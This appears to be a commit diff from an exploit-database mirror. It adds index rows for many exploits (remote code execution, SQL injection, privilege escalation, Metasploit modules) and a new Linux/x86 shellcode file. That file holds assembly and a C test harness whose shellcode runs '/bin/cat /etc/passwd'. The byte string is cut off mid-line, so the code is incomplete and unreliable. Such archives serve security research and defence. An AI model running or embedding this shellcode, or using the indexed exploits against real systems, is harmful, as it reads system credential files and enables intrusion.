44906,exploits/windows/local/44906.txt,"Microsoft COM for Windows - Privilege Escalation",2018-06-18,"Code White",local,windows,
44920,exploits/linux/local/44920.txt,"Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution",2018-06-21,"Paul Taylor",local,linux,
44961,exploits/windows/local/44961.txt,"Enhanced Mitigation Experience Toolkit (EMET) - XML External Entity Injection",2018-07-02,hyp3rlinx,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16588,6 +16592,8 @@ id,file,description,date,author,type,platform,port
44890,exploits/linux/remote/44890.rb,"DHCP Client - Command Injection 'DynoRoot' (Metasploit)",2018-06-13,Metasploit,remote,linux,
44921,exploits/linux/remote/44921.txt,"Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution",2018-06-21,"Paul Taylor",remote,linux,22
44941,exploits/windows/remote/44941.txt,"Foxit Reader 9.0.1.1049 - Remote Code Execution",2018-06-25,mr_me,remote,windows,
44968,exploits/windows/remote/44968.rb,"FTPShell client 6.70 (Enterprise edition) - Stack Buffer Overflow (Metasploit)",2018-07-02,Metasploit,remote,windows,
44969,exploits/linux/remote/44969.rb,"Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit)",2018-07-02,Metasploit,remote,linux,80
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -38100,7 +38106,7 @@ id,file,description,date,author,type,platform,port
41346,exploits/php/webapps/41346.txt,"Joomla! Component JE Ticket System 1.2 - SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php,
41347,exploits/php/webapps/41347.txt,"Joomla! Component JE Messanger - SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php,
41359,exploits/php/webapps/41359.txt,"Itech B2B Script 4.29 - Multiple Vulnerabilities",2017-02-12,"Marc Castejon",webapps,php,
41360,exploits/hardware/webapps/41360.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution (Metasploit)",2017-02-15,RandoriSec,webapps,hardware,
41360,exploits/hardware/webapps/41360.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - 'testaction.cgi' Remote Command Execution (Metasploit)",2017-02-15,RandoriSec,webapps,hardware,
41361,exploits/hardware/webapps/41361.txt,"Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities",2016-11-28,SlidingWindow,webapps,hardware,
41362,exploits/php/webapps/41362.txt,"Joomla! Component JoomBlog 1.3.1 - SQL Injection",2017-02-15,"Ihsan Sencan",webapps,php,
41368,exploits/php/webapps/41368.txt,"Joomla! Component JSP Store Locator 2.2 - 'id' SQL Injection",2017-02-15,"Ihsan Sencan",webapps,php,
@ -39605,3 +39611,7 @@ id,file,description,date,author,type,platform,port
44954,exploits/php/webapps/44954.txt,"hycus CMS 1.0.4 - Authentication Bypass",2018-06-28,"Berk Dusunur",webapps,php,
44955,exploits/hardware/webapps/44955.txt,"DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting",2018-06-28,"Adipta Basu",webapps,hardware,80
44956,exploits/hardware/webapps/44956.py,"Cisco Adaptive Security Appliance - Path Traversal",2018-06-28,"Yassine Aboukir",webapps,hardware,
44957,exploits/hardware/webapps/44957.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)",2018-07-02,RandoriSec,webapps,hardware,80
44959,exploits/hardware/webapps/44959.py,"VMware NSX SD-WAN Edge < 3.1.2 - Command Injection",2018-07-02,ParagonSec,webapps,hardware,
44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80
44964,exploits/php/webapps/44964.txt,"Dolibarr ERP CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -892,3 +892,4 @@ id,file,description,date,author,type,platform
44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm
44856,shellcodes/arm/44856.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)",2018-06-08,rtmcx,shellcode,arm
44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86

1 id file description date author type platform
892 44808 shellcodes/linux_x86/44808.c Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes) 2018-05-31 Paolo Perego shellcode linux_x86
893 44811 shellcodes/arm/44811.c Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes) 2018-05-31 Ken Kitahara shellcode arm
894 44856 shellcodes/arm/44856.c Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes) 2018-06-08 rtmcx shellcode arm
895 44963 shellcodes/linux_x86/44963.c Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes) 2018-07-02 Anurag Srivastava shellcode linux_x86

41
shellcodes/linux_x86/44963.c Normal file
View file

@ -0,0 +1,41 @@
/*
# Linux/x86 - execve /bin/cat /etc//passwd shellcode (37 bytes)
# Author: Anurag Srivastava
# Tested on: i686 GNU/Linux
# Shellcode Length: 37
#Greetz - Manish Kishan Tanwar,Kishan Sharma,Vardan,Himanshu,Ravi and Spirited w0lf
Disassembly of section .text:
08048060 <_start>:
8048060: 29 c9 sub ecx,ecx
8048062: 51 push ecx
8048063: 68 2f 63 61 74 push 0x7461632f
8048068: 68 2f 62 69 6e push 0x6e69622f
804806d: 89 e3 mov ebx,esp
804806f: 51 push ecx
8048070: 68 73 73 77 64 push 0x64777373
8048075: 68 2f 2f 70 61 push 0x61702f2f
804807a: 68 2f 65 74 63 push 0x6374652f
804807f: 89 e1 mov ecx,esp
8048081: 6a 0b push 0xb
8048083: 58 pop eax
8048084: 6a 00 push 0x0
8048086: 51 push ecx
8048087: 53 push ebx
8048088: 89 e1 mov ecx,esp
804808a: cd 80 int 0x80
===============POC by Anurag Srivastava=========================
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x29\xc9\x51\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x51\x68\x73\x73\x77\x64\x68\x$
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}